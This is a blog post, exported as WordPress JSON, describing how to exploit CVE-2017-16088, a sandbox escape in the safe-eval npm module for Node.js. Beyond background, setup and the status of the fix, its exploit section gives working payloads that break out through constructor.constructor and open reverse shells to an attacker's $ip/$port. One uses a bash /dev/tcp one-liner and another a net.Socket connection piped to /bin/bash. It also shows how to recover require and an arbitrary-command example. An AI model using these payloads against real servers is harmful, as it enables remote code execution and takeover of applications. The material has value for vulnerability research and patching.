{"id":559,"date":"2019-08-16T16:52:47","date_gmt":"2019-08-16T20:52:47","guid":{"rendered":"http:\/\/www.wispwisp.com\/?p=559"},"modified":"2020-12-08T21:49:35","modified_gmt":"2020-12-08T21:49:35","slug":"cve-2017-16088-poc","status":"publish","type":"post","link":"https:\/\/www.wispwisp.com\/index.php\/2019\/08\/16\/cve-2017-16088-poc\/","title":{"rendered":"Exploit CVE-2017-16088"},"content":{"rendered":"\n\n\n

CVE Detail(Link<\/a>):<\/strong><\/h3>\n\n\n\n

The safe-eval module describes itself as a safer version of eval. By accessing the object constructors, un-sanitized user input can access the entire standard library and effectively break out of the sandbox.<\/em><\/p><\/blockquote>\n\n\n\n

<\/div>\n\n\n\n

Background:<\/strong><\/h3>\n\n\n\n

On Mar 3, 2017, Github user \u201codino\u201d opened a security issue in the safeEval GitHub repository and provide a one-line PoC(Link<\/a>). The payload is: <\/p>\n\n\n\n

var safeEval = require('safe-eval');\nsafeEval(\"this.constructor.constructor('return process')().exit()\");<\/pre>\n\n\n\n
Execute the payload above will cause Node to exit the current process.  If you run the payload in a Node console in the terminal, it will quit\/exit the console. This one-line Poc payload is not particularly interesting and useful. Search over the internet, I am not able to find any exploit that makes use of this CVE. In this blog, I will talk about how to install Node.js and the vulnerable version of safe-eval(0.3.0)<\/code>, the difference between eval<\/code> and safe-eval<\/code>, and provide a few payloads to gain reverse shell. <\/p>\n\n\n\n
<\/div>\n\n\n\n
Setup:<\/strong><\/h3>\n\n\n\n
1. Download Node.js installation pack from https:\/\/nodejs.org\/en\/<\/a> and install it on the system.
2. Install the vulnerable version of safeEval<\/code>  by typing npm install safe-eval@0.3.0 --save<\/code>  in the Terminal.<\/p>\n\n\n\n
<\/div>\n\n\n\n
Regular eval<\/strong><\/h3>\n\n\n\n
Before going into safe-eval<\/code>, let’s try out regular eval<\/code> first:<\/p>\n\n\n\n
var user_input = \"require('child_process').exec('touch hacked.txt')\";\neval(user_input);<\/pre>\n\n\n\n
Execute code above in the Node console will create a file hacked.txt on the system. In a Node.js web application, if a user has control over the value of the user_input<\/code> variable, the user can execute arbitrary code on the application server, which is pretty bad. \ud83d\ude41<\/p>\n\n\n\n
<\/div>\n\n\n\n
safe-eval<\/strong><\/h3>\n\n\n\n
What is safe-eval? According to the README on it’s GitHub repository:<\/p>\n\n\n\n
safe-eval<\/code> lets you execute JavaScript code without having to use the much discouraged and feared upon eval()<\/code>. safe-eval<\/code> has access to all the standard APIs of the V8 JavaScript Engine<\/a>. By default, it does not have access to the Node.js API.<\/p><\/blockquote>\n\n\n\n
safe-eval<\/code> is a safer version of eval<\/code>. For example, the input that works with eval<\/code> will failed with safe-eval<\/code>.<\/p>\n\n\n\n
var safeEval = require('safe-eval');\nvar user_input = \"require('child_process').exec('touch hacked.txt')\";\nsafeEval(user_input);<\/pre>\n\n\n\n
\"\"<\/p>\n\n\n\n
<\/div>\n\n\n\n
The exploit:<\/strong><\/h3>\n\n\n\n
From my understanding, to get around the restrictions imposed by safe-eval<\/code>, the goal is to escape the Node.js vm\/sandbox. Lots of research has been done in this field, here is a couple of them:<\/p>\n\n\n\n
https:\/\/gist.github.com\/jcreedcmu\/4f6e6d4a649405a9c86bb076905696af<\/a><\/p>\n\n\n\n
https:\/\/github.com\/patriksimek\/vm2\/issues\/32<\/a><\/p>\n\n\n\n
https:\/\/odino.org\/eval-no-more-understanding-vm-vm2-nodejs\/<\/a><\/p>\n\n\n\n
https:\/\/pwnisher.gitlab.io\/nodejs\/sandbox\/2019\/02\/21\/sandboxing-nodejs-is-hard.html<\/a><\/p>\n\n\n\n\n\n
Here are a few payloads to get a reverse shell. You might encounter an error from Node, complaining ReferenceError<\/em><\/strong> this<\/code> is not defined<\/em><\/strong>. Try to replace the keyword this<\/code> to Object<\/code>, global<\/code> or any object you have access to.<\/p>\n\n\n\n
Reverse shell payload with the bash-one-line:<\/p>\n\n\n\n
safeEval(\"this.constructor.constructor('return child_process')().exec('bash -i >& \/dev\/tcp\/$ip\/$port 0>&1')\");<\/pre>\n\n\n\n
Reverse shell payload with JavaScript:<\/p>\n\n\n\n
safeEval(\"net = this.constructor.constructor('return net')(), sh = this.constructor.constructor('return child_process')().exec('\/bin\/bash');\nclient = new net.Socket();client.connect($port, '$ip', function(){client.pipe(sh.stdin);sh.stdout.pipe(client);\nsh.stderr.pipe(client);});\");<\/pre>\n\n\n\n
If require<\/code> is not available, to obtain the require<\/code> by:<\/p>\n\n\n\n
process = this.constructor.constructor('return (function(){return process})()')();\nvar require = process.mainModule.require;<\/pre>\n\n\n\n
If you are able to define an arbitrary function in the program: <\/p>\n\n\n\n
var context= {world: function () { return child_process.exec(\"bash -c 'bash -i >& \/dev\/tcp\/$ip\/$port 0>&1'\")}}\nsafeEval('{hello: world()}',context)<\/pre>\n\n\n\n
<\/div>\n\n\n\n
Fix. Fixed?<\/strong><\/h3>\n\n\n\n
The author claims the vulnerability is fixed(Link<\/a>). However, GitHub user ‘cpcallen’ reply to the GitHub issue about bypass the Fix. (Link<\/a>)  , and NOT so safe eval<\/a> by ‘ChrisCinelli’. The author has this statement in the safe-eval<\/code> repository. Maybe not so safe \ud83d\ude42 .<\/p>\n\n\n\n
UPDATE 27\/08\/2018:<\/em> There are still ways to crash the Node process, please use safe-eval<\/code> only with content created by yourself or from trusted sources. User-submitted data should not be run through safe-eval<\/code>. Thanks @cpcallen<\/a> for the report.<\/p><\/blockquote>\n","protected":false},"excerpt":{"rendered":"
CVE Detail(Link): The safe-eval module describes itself as a safer version of eval. By accessing the object constructors, un-sanitized user input can access the entire standard library and effectively break out of the sandbox. Background: On Mar 3, 2017, Github user \u201codino\u201d opened a security issue in the safeEval GitHub repository and provide a one-line […]<\/p>\n","protected":false},"author":1,"featured_media":688,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[2,3],"tags":[],"_links":{"self":[{"href":"https:\/\/www.wispwisp.com\/index.php\/wp-json\/wp\/v2\/posts\/559"}],"collection":[{"href":"https:\/\/www.wispwisp.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.wispwisp.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.wispwisp.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.wispwisp.com\/index.php\/wp-json\/wp\/v2\/comments?post=559"}],"version-history":[{"count":2,"href":"https:\/\/www.wispwisp.com\/index.php\/wp-json\/wp\/v2\/posts\/559\/revisions"}],"predecessor-version":[{"id":752,"href":"https:\/\/www.wispwisp.com\/index.php\/wp-json\/wp\/v2\/posts\/559\/revisions\/752"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.wispwisp.com\/index.php\/wp-json\/wp\/v2\/media\/688"}],"wp:attachment":[{"href":"https:\/\/www.wispwisp.com\/index.php\/wp-json\/wp\/v2\/media?parent=559"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.wispwisp.com\/index.php\/wp-json\/wp\/v2\/categories?post=559"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.wispwisp.com\/index.php\/wp-json\/wp\/v2\/tags?post=559"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}